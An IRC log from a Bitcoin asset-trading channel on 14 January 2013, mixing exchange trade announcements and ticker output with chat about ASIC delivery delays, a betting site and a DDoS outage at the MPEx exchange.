Jan 14 08:32:41 o hey, so bfl delivers in 30 days ? Jan 14 08:33:00 [BTCTC] [BTC-BOND] 1000 @ 0.01 = 10 BTC [-] Jan 14 09:00:36 Someone felt like lending me some funds Jan 14 09:45:35 Namworld, you can always up it to say... 0.05% or 0.1%/day and perhaps more people will buy Jan 14 09:48:04 [MPEX] [S.DICE] 650 @ 0.0047146 = 3.0645 BTC [-] Jan 14 09:48:06 [MPEX] [S.DICE] 50 @ 0.00472297 = 0.2361 BTC [+] Jan 14 09:55:30 ;;calc 60733342 / 21778561.0 Jan 14 09:55:31 2.78867561544 Jan 14 09:55:59 3ish to 1 bfl won't deliver. heh. **** BEGIN LOGGING AT Mon Jan 14 10:03:59 2013 Jan 14 10:05:04 [MPEX] [S.MPOE] 11139 @ 0.0006368 = 7.0933 BTC [+] Jan 14 10:05:58 Too expensive Jan 14 10:06:29 I once was at 0.5% weekly, which is not too far to 0.1%... too costly. Jan 14 10:13:53 [MPEX] [S.DICE] 900 @ 0.00472297 = 4.2507 BTC [+] Jan 14 10:14:45 [BTCTC] [ESECURITYSABTC] 7 @ 0.7894 = 5.5258 BTC [+] Jan 14 10:27:56 [MPEX] [S.DICE] 4750 @ 0.00468939 = 22.2746 BTC [-] Jan 14 10:27:57 [MPEX] [S.DICE] 932 @ 0.00468137 = 4.363 BTC [-] Jan 14 10:27:59 [MPEX] [S.DICE] 810 @ 0.00466556 = 3.7791 BTC [-] Jan 14 10:28:00 [MPEX] [S.DICE] 743 @ 0.00466053 = 3.4628 BTC [-] Jan 14 10:29:50 [MPEX] [S.DICE] 50 @ 0.00472297 = 0.2361 BTC [+] Jan 14 10:29:52 [MPEX] [S.DICE] 950 @ 0.00473096 = 4.4944 BTC [+] Jan 14 10:34:06 [MPEX] [S.DICE] 900 @ 0.00471904 = 4.2471 BTC [-] Jan 14 10:34:08 [MPEX] [S.DICE] 400 @ 0.00473096 = 1.8924 BTC [+] Jan 14 10:41:47 [MPEX] [S.MPOE] 5000 @ 0.00064579 = 3.229 BTC [+] Jan 14 10:41:48 [MPEX] [S.MPOE] 9462 @ 0.0006458 = 6.1106 BTC [+] Jan 14 10:41:50 [MPEX] [S.MPOE] 6170 @ 0.00065288 = 4.0283 BTC [+] Jan 14 10:41:51 [MPEX] [S.MPOE] 7202 @ 0.0006529 = 4.7022 BTC [+] Jan 14 10:41:51 [MPEX] [S.MPOE] 4468 @ 0.00065516 = 2.9273 BTC [+] Jan 14 10:41:53 [MPEX] [S.MPOE] 2153 @ 0.00065996 = 1.4209 BTC [+] Jan 14 10:41:54 [MPEX] [S.MPOE] 6300 @ 0.00065996 = 4.1577 BTC [+] Jan 14 10:41:55 [MPEX] [S.MPOE] 3700 @ 0.00065997 = 2.4419 BTC [+] Jan 14 10:41:56 [MPEX] [S.MPOE] 1000 @ 0.00065998 = 0.66 BTC [+] Jan 14 10:41:57 [MPEX] [S.MPOE] 7000 @ 0.00065999 = 4.6199 BTC [+] Jan 14 10:41:59 [MPEX] [S.MPOE] 8000 @ 0.00065999 = 5.2799 BTC [+] Jan 14 10:42:00 [MPEX] [S.MPOE] 4939545 @ 0.00066 = 3260.0997 BTC [+] Jan 14 10:42:18 !! Jan 14 10:43:09 what is the source of income for MPOE? Jan 14 10:43:21 mpoe.bot Jan 14 10:43:33 a bot? Jan 14 10:43:35 the options Jan 14 10:43:45 it buys/sells options on MPEx Jan 14 10:44:11 And those options are derivatives of what? Jan 14 10:44:26 so it basically goes long and short on BTC/USD at the same time. With an extra margin. Jan 14 10:44:29 or what is the underlying stuff Jan 14 10:44:38 calls and puts on the value of btc Jan 14 10:45:08 OK, I see. So everyone buying those must be most of the time on the looser side? Jan 14 10:45:42 loser* Jan 14 10:46:04 I suppose. Although they might be hedging. Jan 14 10:46:30 [MPEX] [S.BBET] 150000 @ 0.0018 = 270 BTC [-] Jan 14 10:47:00 azx notably in august buyers made a killing Jan 14 10:47:01 BBET, this is something new Jan 14 10:47:15 but in general the thing with options is most expire worthless. Jan 14 10:47:28 bbet is bitbet.us, which launched a week or two ago Jan 14 10:47:51 the 5th Jan 14 10:48:14 nice -->> [08:42:02] <@assbot> [MPEX] [S.MPOE] 4939545 @ 0.00066 = 3260.0997 BTC [+] Jan 14 10:48:20 same as http://betsofbitco.in/ ? Jan 14 10:48:27 no, much better Jan 14 10:48:31 !ticker m s.mpoe Jan 14 10:48:33 [MPEX:S.MPOE] 1D: 0.00062772 / 0.00065956 / 0.00066 (5075034 shares, 3,347.30 BTC), 7D: 0.00062769 / 0.0006573 / 0.00066 (11526130 shares, 7,576.16 BTC), 30D: 0.00058738 / 0.00063499 / 0.00066 (47141395 shares, 29,934.58 BTC) Jan 14 10:48:49 better how? Looks like same stuff Jan 14 10:48:50 cool! Jan 14 10:49:04 yes well, superficially everything looks like the same stuff. Jan 14 10:49:25 so how it's better then? :) Jan 14 10:49:41 http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Jan 14 10:49:45 for instance. Jan 14 11:01:56 mircea_popescu: well Jan 14 11:02:18 doesnt that mean they're like a year behind? Jan 14 11:02:32 i think first promise in june 2012 was for october Jan 14 11:02:49 I seem to remember a date before that Jan 14 11:03:06 anyway, it's funny... i have so many bets about diff staying low through jan and feb Jan 14 11:03:23 asicminer is going to be getting the boards back soon Jan 14 11:03:34 i could probably live all this spring only by cashing out what i made out of the poor performance of asic manufacturers Jan 14 11:07:56 Imma reboot Jan 14 11:09:56 hmm... assbot might be broken Jan 14 11:10:05 doesn't it normally show paid dividends? Jan 14 11:11:52 [MPEX] [S.DICE] 1194 @ 0.00466053 = 5.5647 BTC [-] Jan 14 11:11:54 [MPEX] [S.DICE] 656 @ 0.00465944 = 3.0566 BTC [-] Jan 14 11:13:22 Namworld it used to on the old twitter interface. Jan 14 11:13:26 the new thing is in work. Jan 14 11:13:45 oh Jan 14 11:13:56 Well 50 BTC "dividend" on BitVPS Jan 14 11:14:04 It's actually the sale proceeds. Jan 14 11:14:40 S.BVPS paid a total dividend of 50.00000000 BTC to 500`000 outstanding shares. #dividend #bitcoin #btc #stocks Jan 14 11:14:42 it's on twitter. Jan 14 11:14:52 http://twitter.com/MPEx1/status/290745904602951681 Jan 14 11:16:19 Namworld: sale? Jan 14 11:16:42 BitVPS is still in business? Jan 14 11:20:50 because rg sold bitvps =/ Jan 14 11:21:02 liquidation clause Jan 14 11:21:42 he can't sell his majority stake, but needed to quit. So he liquidated. Every share has right to part of that. Jan 14 11:22:24 But the contract has a special clause where each previous shareholder keeps 1 share after the transfer. Jan 14 11:23:52 [MPEX] [S.DICE] 1344 @ 0.00465944 = 6.2623 BTC [-] Jan 14 11:23:54 [MPEX] [S.DICE] 732 @ 0.00463695 = 3.3942 BTC [-] Jan 14 11:24:09 Well should get published soon, so it will be official. You can review it then. Jan 14 11:26:06 Namworld: they are still in business? Jan 14 11:27:09 yes... Me, arij and phungus have been managing it for about a month. Jan 14 11:27:17 azx yes, in the middle of an acquisition. Jan 14 11:27:22 statement tomorrow. Jan 14 11:31:27 [MPEX] [S.DICE] 1579 @ 0.00463695 = 7.3217 BTC [-] Jan 14 11:31:29 [MPEX] [S.DICE] 4150 @ 0.00461007 = 19.1318 BTC [-] Jan 14 11:31:30 [MPEX] [S.DICE] 934 @ 0.0046023 = 4.2985 BTC [-] Jan 14 11:31:32 [MPEX] [S.DICE] 787 @ 0.00459318 = 3.6148 BTC [-] Jan 14 11:31:36 mircea_popescu: what is your involvement in all this? Jan 14 11:32:03 "all this" ? Jan 14 11:34:20 scroll up 6 lines Jan 14 11:38:31 one lists on mpex by signing a contract with mpex. Jan 14 11:39:24 [MPEX] [S.DICE] 2213 @ 0.00459318 = 10.1647 BTC [-] Jan 14 11:39:26 [MPEX] [S.DICE] 2 @ 0.00458415 = 0.0092 BTC [-] Jan 14 11:39:27 [MPEX] [S.DICE] 924 @ 0.00457255 = 4.225 BTC [-] Jan 14 11:39:29 [MPEX] [S.DICE] 2700 @ 0.00456985 = 12.3386 BTC [-] Jan 14 11:39:30 [MPEX] [S.DICE] 1859 @ 0.00456655 = 8.4892 BTC [-] Jan 14 11:49:09 [MPEX] [S.DICE] 1400 @ 0.00463745 = 6.4924 BTC [+] Jan 14 12:08:34 [BTCTC] [ESECURITYSABTC] 10 @ 0.7894 = 7.894 BTC [+] Jan 14 12:08:58 [BTCTC] [ESECURITYSABTC] 1 @ 0.7894 BTC [+] Jan 14 12:23:18 Yes, you are right mpex.co appears to be Offline! Jan 14 12:23:35 wut? Jan 14 12:30:08 mircea_popescu, mpex.co is not even DNS resolving ?! Jan 14 12:30:45 hm Jan 14 12:30:51 looking into this. Jan 14 12:38:56 looks like a little bit of ddos. Jan 14 12:44:11 Attempt to appease the mighty Internet Gods by uploading a ritual dance to youtube... or by burning some servers in sacrifice. Jan 14 12:44:33 Not going to help one bit, but at least it might be fun. =/ Jan 14 12:47:23 Ah well, that's sad. Guess I'll have to wait until tomorrow to complete my orders. Jan 14 12:55:23 Pirate!!! Jan 14 12:57:01 ;;ident Schadenfreude Jan 14 12:57:01 Nick 'Schadenfreude', with hostmask 'Schadenfreude!~m@178.115.248.26.wireless.dyn.drei.com', is not identified. Jan 14 12:57:36 nah, not really pirate :P Jan 14 12:58:51 Iirc he connected from similar ip Jan 14 12:59:27 and your nick is so fitting atm Jan 14 13:00:36 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] Jan 14 13:00:56 Ah, I know what you mean Jan 14 13:01:04 was in a trolly mood Jan 14 13:02:12 I don't think there's any mechanism in place to prevent me from taking various nicknames : p Jan 14 13:02:34 and as I can have multiple clients open at once Jan 14 13:02:43 I can pretend to be pirate Jan 14 13:02:58 though routing it through TOR would've made for ultimate trolling Jan 14 13:03:07 Jan 14 13:17:40 [BTCTC] [ESECURITYSABTC] 12 @ 0.7894 = 9.4728 BTC [+] Jan 14 13:18:40 [BTCTC] [BTC-BOND] 40 @ 0.01 = 0.4 BTC [-] Jan 14 13:38:16 .. or by burning some bitches in sacrifice, lol Jan 14 13:38:35 brb Jan 14 13:47:41 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] Jan 14 14:04:48 mircea_popescu: mpex.co is being ddoses Jan 14 14:04:56 ddosed* Jan 14 14:05:37 yes. Jan 14 14:05:47 quite a chunk too. Jan 14 14:08:57 i still can't resolve the dns Jan 14 14:12:50 do you have access to your name servers? Jan 14 14:13:00 mr. popescu Jan 14 14:14:11 Yep, can't open the site Jan 14 14:15:18 that also means no one can trade on mpex lol Jan 14 14:15:30 unless it's just a dns attack Jan 14 14:19:13 mircea_popescu: you need to cut the line until the botnet stops requesting a dns request Jan 14 14:19:29 i have access to everything Jan 14 14:19:48 but we're doing about 38gb atm so... heh Jan 14 14:21:19 38gb per request? Jan 14 14:21:46 looks like mpex only weakness is a ddos attack' Jan 14 14:23:41 no, per second Jan 14 14:23:47 everyone's weakness is a ddos attack. Jan 14 14:24:00 well not really... Jan 14 14:24:33 distribute the service accross multiple servers... Jan 14 14:24:52 heh. Jan 14 14:25:03 and trust security to a small majority of them ? Jan 14 14:26:40 either that or have a red phone to your isp to pull a kill switch on the bad requests Jan 14 14:27:06 i do. Jan 14 14:27:10 it's not as easy as all that. Jan 14 14:27:38 just blame mpoe-pr Jan 14 14:29:01 she made someone mad Jan 14 14:29:05 boom ddos Jan 14 14:30:01 ;;seen smickles Jan 14 14:30:03 smickles was last seen in #bitcoin-assets 1 day, 10 hours, 27 minutes, and 17 seconds ago: ;;ticker Jan 14 14:42:45 so when do you expect mpex will be back up mr. popescu? Jan 14 14:47:58 working on an actually pretty obnoxiously clever solution Jan 14 14:48:00 won't be long. Jan 14 14:50:30 http://www.downforeveryoneorjustme.com/mpex.co Jan 14 14:51:29 ddos Jan 14 15:06:04 http://mpex.host56.com/ Jan 14 15:06:08 you can use that temporarily Jan 14 15:06:17 i will be building and releasing a huge list of free hosts for mpex Jan 14 15:06:19 yay! Jan 14 15:06:26 it's 100% safe in the sense that gpg is gpg. Jan 14 15:06:36 and well... make taking mpex down way more difficult. Jan 14 15:07:00 the one disadvantage is all the cruft freehosts add to the page, so pympex will need a few cosmetic changes Jan 14 15:07:08 by hand process was tested and works. Jan 14 15:07:14 also main sites will be coming online within hours. Jan 14 15:25:00 mircea_popescu: setup a vm or something somewhere. amazon.. put it behind cloudflare Jan 14 15:25:03 as a backup location Jan 14 15:25:05 and be done with it Jan 14 15:25:13 nah. Jan 14 15:25:21 i will just make one fucking trillion free host proxies. Jan 14 15:25:28 -_-;;; Jan 14 15:26:04 i thought mp was alergic on cloudflare Jan 14 15:26:23 lol Jan 14 15:27:20 Also, have the resolved bitbets from last night been paid out? For example http://bitbet.us/bet/51/nfl-playoffs-new-england-patriots-over-houston/ There is an output link, but no coins back in my wallet. Jan 14 15:27:42 scam Jan 14 15:28:14 Bugpowder, mircea will explain it for ya Jan 14 15:29:20 ok Jan 14 15:31:59 Bugpowder payouts happen in 48 hours tops. Jan 14 15:32:17 ideally instant but it's not automatic so dun pannic. Jan 14 15:33:12 http://mpex.co/ also back online. Jan 14 15:33:30 theoretically this makes it a lot stronger Jan 14 15:33:31 we see. Jan 14 15:34:17 anyone selling hosting services here btw ? Jan 14 15:34:46 Just trying to understand the process, and what resolved vs. closed me. Resolved not linked to payout? Jan 14 15:35:54 closed means no more bets are accepted. Jan 14 15:36:12 resolved means one of the two sides was selected. payments to winning side are due and being processed Jan 14 15:36:24 because of security procedures in place this processing may take a (short) interval. Jan 14 15:55:17 srsly, nobody is selling hosting ?! Jan 14 15:55:51 Namworld and Neotrix spring to mind Jan 14 15:56:29 Neotrix is affiliated with Koddos, which apparently offers DDOS protection too Jan 14 16:01:07 ;;ticker Jan 14 16:01:08 BTCUSD ticker | Best bid: 14.15003, Best ask: 14.22849, Bid-ask spread: 0.07846, Last trade: 14.15003, 24 hour volume: 27519.20464813, 24 hour low: 13.94896, 24 hour high: 14.30000, 24 hour vwap: 14.12675 Jan 14 16:01:09 i don't want ddos protection at all. i want basically a tiny vm to run a php mpex proxy Jan 14 16:01:12 eight lines Jan 14 16:08:49 Luceo does hosting too Jan 14 16:09:15 Try bitcointalk, somebody ought to accept BTC for some hosting Jan 14 16:11:09 yeh. Jan 14 16:23:07 mircea, you did not restart twitter/assapi yet? and rss/json output scriptslike mktdepth.php hang Jan 14 16:27:34 i think you need a flushdns ? Jan 14 16:28:02 !ticker m s.mpoe Jan 14 16:28:04 [MPEX:S.MPOE] 1D: 0.00062772 / 0.00065959 / 0.00066 (5069495 shares, 3,343.84 BTC), 7D: 0.00062769 / 0.00065737 / 0.00066 (11476109 shares, 7,544.08 BTC), 30D: 0.00058738 / 0.000635 / 0.00066 (46830971 shares, 29,737.79 BTC) Jan 14 16:29:35 what was the temp mirror mircea_popescu ? Jan 14 16:29:48 http://mpex.host56.com/ Jan 14 16:29:52 but you can use mpex.co etc Jan 14 16:32:41 i wonder who ddosed you Jan 14 16:33:51 the sec! Jan 14 16:35:40 offtopci mpex looks beautiful in links Jan 14 16:35:44 off topic* Jan 14 16:36:33 :p Jan 14 16:36:48 I'm in class and my monitor is facing the teacher Jan 14 16:39:59 better than coinbr, you can't even log into it Jan 14 16:40:00 from links Jan 14 16:59:42 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] Jan 14 17:05:56 http://tinysong.com/15wM1 Jan 14 17:15:53 [BTCTC] [ESECURITYSABTC] 25 @ 0.7894 = 19.735 BTC [+] Jan 14 17:15:54 [BTCTC] [ESECURITYSABTC] 4 @ 0.7895 = 3.158 BTC [+] Jan 14 17:15:55 [BTCTC] [ESECURITYSABTC] 3 @ 0.799 = 2.397 BTC [+] Jan 14 17:16:46 not so sure about that stock Jan 14 17:18:20 with the whole USD to BTC conversion Jan 14 17:18:30 of profits to dividends Jan 14 17:25:23 Well, 1.3%/week made it suspicious in my eyes Jan 14 17:30:04 [HAVELOCK] [SDICE] 14 @ 0.475 = 6.65 BTC [-] Jan 14 17:30:30 7 is much better. Jan 14 17:34:26 pigeons_ such bullshit. Jan 14 17:42:58 hrm Jan 14 17:43:03 [HAVELOCK] [SDICE] 1 @ 0.48 BTC [+] Jan 14 17:43:19 what's new pussycat **** ENDING LOGGING AT Mon Jan 14 18:00:34 2013 **** BEGIN LOGGING AT Mon Jan 14 18:01:01 2013 **** ENDING LOGGING AT Mon Jan 14 18:01:08 2013 **** BEGIN LOGGING AT Mon Jan 14 18:01:44 2013 Jan 14 18:02:05 and now we know mircea's ip addy. Jan 14 18:02:56 lol you had it for years Jan 14 18:05:08 ;;later tell bugpowder the transactions in question had been sent ~15 hours ago. they failed to propagate for some reason tho. all should be well nao Jan 14 18:05:09 The operation succeeded. Jan 14 18:10:38 https://bitcointalk.org/index.php?topic=75802.msg1453630#msg1453630 Jan 14 18:12:30 what pressing issues jurov? Jan 14 18:13:17 things i had no time to do till now Jan 14 18:13:45 like actual affiliate credit payouts :/ Jan 14 18:14:11 some ppl can expect a nice little surprise later today Jan 14 18:15:01 !ticker S.MPOE Jan 14 18:15:02 Provide exchange and ticker. Jan 14 18:15:07 !ticker m S.MPOE Jan 14 18:15:10 [MPEX:S.MPOE] 1D: 0.00062772 / 0.00065956 / 0.00066 (5074495 shares, 3,346.98 BTC), 7D: 0.00062769 / 0.00065738 / 0.00066 (11455209 shares, 7,530.44 BTC), 30D: 0.00058738 / 0.000635 / 0.00066 (46751688 shares, 29,687.66 BTC) Jan 14 18:15:28 gigavps: how fast will you be hashing once gigamining is all set up with ASICs? Jan 14 18:16:24 as fast as humanly possible Jan 14 18:16:42 all of the pieces are in place Jan 14 18:17:00 guess who is on the phone with mastercard Jan 14 18:17:10 guess who had 3 bASIC ordered Jan 14 18:17:14 jcpham? Jan 14 18:17:18 me! Jan 14 18:17:44 lol that's not a number ;) Jan 14 18:18:08 no faith in azns huh Jan 14 18:18:39 Korbman any gigaminer that signs the new contract for Teramining will be able to be privy to all information regarding VPS' strategies Jan 14 18:18:51 because there is a NDA included in the contract Jan 14 18:19:45 i'm sortof scared though Jan 14 18:19:58 because i'm talking to paypal because it's a paypal mastercard Jan 14 18:20:06 Ha, I figured I'd ask anyway Jan 14 18:22:05 jcpham smart man Jan 14 18:26:29 paypal asked what it is Jan 14 18:26:39 "experimental cryptographic hardware Jan 14 18:29:46 that's was difficult to dance around Jan 14 18:30:07 never said the word bitcoin on chargeback dispute for btcfpga.com Jan 14 18:31:34 so basic isn't doing striaght up refunds, you have to chargeback? Jan 14 18:32:07 i paid with cc Jan 14 18:32:09 fuck 'em Jan 14 18:32:12 http://www.investopedia.com/terms/m/mt-gox.asp?partner=rss-termofday#axzz2HxvCsB4v Jan 14 18:32:35 6 months ago i would have let it play out Jan 14 18:32:40 yeah Jan 14 18:32:51 now i'm not patient enough for fail boats Jan 14 18:37:09 lol jcpham fail boats Jan 14 18:37:28 gigavps gets the reference Jan 14 18:37:39 bitcoin is full shinking ship fail boats Jan 14 18:38:15 We're sorry, but that is an invalid password. Valid passwords can contain only numbers, characters, and underscores. Jan 14 18:38:19 in 2013 ;/ Jan 14 18:39:09 lol Jan 14 18:39:18 i had a site limit me to 16 characters Jan 14 18:39:27 because i use 30 Jan 14 18:39:39 we are sorry but you seem to have used the letter t Jan 14 18:39:47 we only allow vowels in our passwords Jan 14 19:10:27 http://shrani.si/f/N/FT/2yWZ9LdN/422257522727834424341135.jpg Jan 14 19:11:47 because an AR-15 fires a projectile, whereas a car, knife, or hammer does not Jan 14 19:14:06 all of the above can be a projectile Jan 14 19:14:35 or projectalised Jan 14 19:14:39 did Basic have a bitpay account? Jan 14 19:21:04 hahah I suppose that's true...though I'd say the effective range varies greatly Jan 14 19:21:28 I assume a semi-auto rifle is a lot more useful for self defence than any other object in that img Jan 14 19:22:17 1 of Spartacus Blown Medium Realistic Glass Dildo, Clear [ASIN: B006U1Z6UW] Jan 14 19:22:18 ------------- Begin message ------------- Jan 14 19:22:18 Hello Josh, Jan 14 19:22:18 We are sorry to inform you that we no longer have this item in stock, and we apologize for any inconvenience this may have caused Jan 14 19:22:50 that was going to be the centerpiece of the whole room Jan 14 19:23:42 bwahah Jan 14 19:24:01 Isn't glass poor material for a dildo? Jan 14 19:24:22 just hope it doesn't break... Jan 14 19:24:22 shrug Jan 14 19:24:30 gotta be pyrex or some shit Jan 14 19:24:56 Better than 1 guy 1 cup Jan 14 19:25:04 I was going to glue it to my neighbors house Jan 14 19:25:04 [HAVELOCK] [SDICE] 7 @ 0.48 = 3.36 BTC [+] Jan 14 19:25:33 or possibly put it at the top of a radio tower Jan 14 19:27:07 tip of a radio tower Jan 14 19:29:53 feadal times Jan 14 19:30:06 [HAVELOCK] [SDICE] 25 @ 0.485 = 12.125 BTC [+] Jan 14 19:35:02 [HAVELOCK] [SDICE] 23 @ 0.485 = 11.155 BTC [+] Jan 14 19:35:17 trilema needs a search bar Jan 14 19:35:38 waaaah Jan 14 19:37:36 lol thestringpusher Jan 14 19:42:53 lol Jan 14 19:53:44 did you guys see this -> https://forums.butterflylabs.com/attachments/announcements/394d1358117669-bfl-asic-status-prodn.jpg Jan 14 19:54:48 Yup, what about it? Jan 14 19:54:59 I admit I haven't really looked at it that much though Jan 14 19:55:08 can anyone tell me what the blue parts are, there are 16 of them Jan 14 20:02:08 umm im being asked for user/pass Jan 14 20:02:13 can you make a userless link? Jan 14 20:02:34 upload it to somewhere? Jan 14 20:02:55 http://i.imgur.com/tNLUo.jpg Jan 14 20:02:59 ty Jan 14 20:16:38 clock Jan 14 20:16:41 buffets Jan 14 20:17:01 lol Jan 14 20:24:10 http://trilema.com/2013/a-little-bit-of-ddos/ Jan 14 20:24:13 if anyone's curious Jan 14 20:38:07 Is it likely for the the BTC price to fall in the next two weeks? Not much, but to about $13 Jan 14 20:39:45 I'm sitting on some cash which would best be put to work as BTC, but I'm afraid I'll lose 5-10% on a price drop Jan 14 20:43:20 You could hedge it a bit...buy 1/3 of your bitcoins now, another 1/3 next week, and 1/3 a week after that. Jan 14 20:45:13 why does 5-10% make a difference ? Jan 14 20:46:16 Well, buying now would be bad if the price dropped 5-10% again in the next time Jan 14 20:47:22 if btc is going up to infinity, then infinity minus 5% is not materially different Jan 14 20:47:31 if btc is not going up to infinity it's not worth buying in the first place. Jan 14 20:48:03 [HAVELOCK] [SDICE] 16 @ 0.489 = 7.824 BTC [+] Jan 14 20:48:09 that's why you buy both times...buying now at $14.20, then again at $14 would give you an average of $14.10 ...if it goes above that you make a profit Jan 14 20:48:27 it's just trying to figure out when it's going to go up that's the hard part Jan 14 20:48:42 my first btc i bought at 15. Jan 14 20:48:59 same Jan 14 20:49:10 then it was 2. Jan 14 20:49:20 well... i bought more. Jan 14 20:49:23 Better than buying at 35, I guess Jan 14 20:50:02 someone who spent 35k to buy 1k btc at 35 and kept them has 1k btc. Jan 14 20:50:07 I suppose it depends if you're looking for short term or long term gains Jan 14 20:50:12 someone who bought 1k btc at .5 and invested it with pirate... Jan 14 20:51:05 ...early has 1k+(1.07^4 weeks) Jan 14 20:51:10 haha Jan 14 20:51:18 indeed :D Jan 14 20:51:32 And if somebody invested with pirate and got out in time... Jan 14 20:51:48 how many weeks is that ? Jan 14 20:53:15 sorry, should read "*" not "+" Jan 14 20:53:25 and it's for 4 weeks...I figured a month would be fine Jan 14 20:53:43 1310btc if you invested early with pirate Jan 14 20:53:51 heh. Jan 14 20:53:54 and reinvested Jan 14 20:53:58 haha Jan 14 20:54:02 if you bought s.mpoe early... it was like 2k satoshi. Jan 14 20:54:22 mp, how many % of your money did you convert to BTC? Curious how confident you are with it Jan 14 20:54:40 !ticker m s.mpoe Jan 14 20:54:43 [MPEX:S.MPOE] 1D: 0.00062772 / 0.00065962 / 0.00066 (5065195 shares, 3,341.14 BTC), 7D: 0.00062769 / 0.00065738 / 0.00066 (11455209 shares, 7,530.44 BTC), 30D: 0.00058738 / 0.00063503 / 0.00066 (46620168 shares, 29,605.34 BTC) Jan 14 20:54:49 Schadenfreude not a large part. Jan 14 21:21:03 [HAVELOCK] [SDICE] 21 @ 0.48 = 10.08 BTC [-] Jan 14 21:28:47 https://nastyfans.org - Now open to new members. Jan 14 21:31:22 you need a better logo. Jan 14 21:32:04 and a working ssl cert :p Jan 14 21:32:38 Thanks for the advice. A logo wasn't a big concern obviously and the ssl cert works fine, it just is private. ;) Jan 14 21:33:09 assbot isnt announcing mpex trades Jan 14 21:33:16 Concerns were speed and functionality. :) Jan 14 21:35:56 lol, mircea_popescu is talking about design Jan 14 21:36:26 those who own 1998 looking websites should not cast stones! Jan 14 21:36:39 gigavps I had a chuckle at that as well. Jan 14 21:36:46 tbh i think the mpex logo is kinda snappy Jan 14 21:37:06 logo you say? Jan 14 21:37:07 the M Jan 14 21:37:14 it's a nice font Jan 14 21:37:17 please link this image Jan 14 21:37:32 http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Jan 14 21:37:33 mpex.co/favicon.ico Jan 14 21:37:35 might take a reload Jan 14 21:38:10 bigger: http://bitbet.us/media/images/ads/mpex-468x60.png Jan 14 21:38:30 | | 0.00451334 | 1`012 | Jan 14 21:38:30 |-----------+------------+----------| Jan 14 21:38:33 | 1`201 | 0.00450700 | | Jan 14 21:38:43 current spread Jan 14 21:38:45 lol someone likes linx ? Jan 14 21:39:11 jebus fuck, when did bitbet get an over 1kbtc bet going Jan 14 21:39:37 it moves quickly. Jan 14 21:39:39 smickles: you return Jan 14 21:39:44 can we talk soon? Jan 14 21:39:54 I guess it's nearly 1k anyway Jan 14 21:39:58 thestringpuller: sure :) Jan 14 21:40:55 lets meey at 1900 utc Jan 14 21:41:55 ah, so tomorrow? Jan 14 21:44:49 Not sure what exactly assbot needs, but this list of seat transfers is available publicly... https://nastyfans.org/buys.csv Jan 14 21:46:51 https://bitcointalk.org/index.php?topic=136499.0 Jan 14 21:46:55 mircea_popescu: when will assbot get sales again? Jan 14 21:47:36 thestringpuller prolly tomorrow. Jan 14 21:51:07 mircea_popescu: ya know, i was coding an mpex android client for myself, I couldn't find which font that 'M' is Jan 14 21:51:17 >D Jan 14 21:51:22 i ended up using comic sans, 'cause it looks close Jan 14 21:51:26 ahahaha asshat Jan 14 21:51:29 it's not as wide tho Jan 14 21:51:38 comic looks niothing like! Jan 14 21:51:46 ;D Jan 14 21:52:06 lets see, what did I actually use... Jan 14 21:54:53 wingdings Jan 14 21:55:16 trebuchet MS Jan 14 21:56:46 lol Jan 14 21:56:56 woah, mpoebot is offline? Jan 14 21:57:10 quick, someone give me a bunch of btc to pipe into my bot! Jan 14 21:57:11 no, just can't get price signal. Jan 14 21:57:26 i mean she could, but meh. Jan 14 21:57:27 you can't get a price signal? Jan 14 21:57:37 im a little walled in. Jan 14 21:57:41 o, you missed the day's events huh Jan 14 21:57:48 http://trilema.com/2013/a-little-bit-of-ddos/ Jan 14 21:57:53 0_o Jan 14 22:01:09 "Late in 1993 I sold 10 million shares of Cap Cities at $63; at year-end 1994, the price was $85 1/4. (The difference is $222.5 million for those of you who wish to avoid the pain of calculating the damage yourself.) When we purchased the stock at $17.25 in 1986, I told you that I had previously sold our Cap Cities holdings at $4.30 per share during 1978-80, and added that I was at a loss to explain my earlier behavior Jan 14 22:01:09 ." Jan 14 22:01:51 "One bot, for instance, asked no less than 720 times for the same order to be cancelled, because it wasn’t getting the one response it was expecting." um... Jan 14 22:02:25 a-ha Jan 14 22:03:56 would that happen to be order 5228684 Jan 14 22:04:02 >_> Jan 14 22:04:07 <_< Jan 14 22:05:14 :p Jan 14 22:08:58 I told you that I had some 'optimization' to do Jan 14 22:09:29 particularly, inserting sleep statements. Jan 14 22:10:14 hey, ther's a sleep statement Jan 14 22:10:30 it's just something like half a second currently Jan 14 22:10:41 lol...examining the situation every 10-20s is good enough Jan 14 22:13:19 i tell you, at least some of these ninjas who issued orders mid-BBET-IPO actually did it via coinbr Jan 14 22:13:42 and even for that it wasn;t necessary to hit it every half second Jan 14 22:15:08 actually i think next ipo in that style will be +3 seconds rather than +! Jan 14 22:19:43 When Richard Branson, the wealthy owner of Virgin Atlantic Jan 14 22:19:43 Airways, was asked how to become a millionaire, he had a quick Jan 14 22:19:43 answer: "There's really nothing to it. Start as a billionaire and then Jan 14 22:19:43 buy an airline." Jan 14 22:21:01 lol Jan 14 22:21:08 marvelous strategy Jan 14 22:21:21 why didn't I think of that? Jan 14 22:21:56 obviously it's not for you. Jan 14 22:22:06 this be for smart people. Jan 14 22:22:26 lol Jan 14 22:30:36 "Well, I'll tell you one thing. Having a kid ended my addiction to being a recreational asswipe and made me seriously consider stopping that professionally." Jan 14 22:31:21 lol Jan 14 22:32:28 that bfl core pic is not for flip-chip design but for wirebond Jan 14 22:35:00 pigeons https://bitcointalk.org/index.php?topic=133819.0 Jan 14 22:35:13 EskimoBob: actually, I just made it up Jan 14 22:35:40 I thought it sounded better as an unattributed quote Jan 14 22:36:29 clearly, i'm a literary genious because it brought an excellent image to your mind Jan 14 22:36:41 ;> Jan 14 22:36:42 also because you can speal. Jan 14 22:37:03 :o Jan 14 22:37:06 >D Jan 14 22:37:35 anything new and awesome happening on the bitcointalk forums? Jan 14 22:37:40 i'm so out of touch... Jan 14 22:37:45 EskimoBob: well, i meant from an artistic point of view Jan 14 22:38:32 jcpham inaba proposed Jan 14 22:38:35 to usagi. Jan 14 22:38:41 woah Jan 14 22:38:46 sweet Jan 14 22:38:58 ;;ticker Jan 14 22:39:01 BTCUSD ticker | Best bid: 14.25004, Best ask: 14.29000, Bid-ask spread: 0.03996, Last trade: 14.25004, 24 hour volume: 22752.84667883, 24 hour low: 14.06541, 24 hour high: 14.34600, 24 hour vwap: 14.22608 Jan 14 22:39:04 i hope someone took pictures/sideway video Jan 14 22:39:15 nothink like portrait-video Jan 14 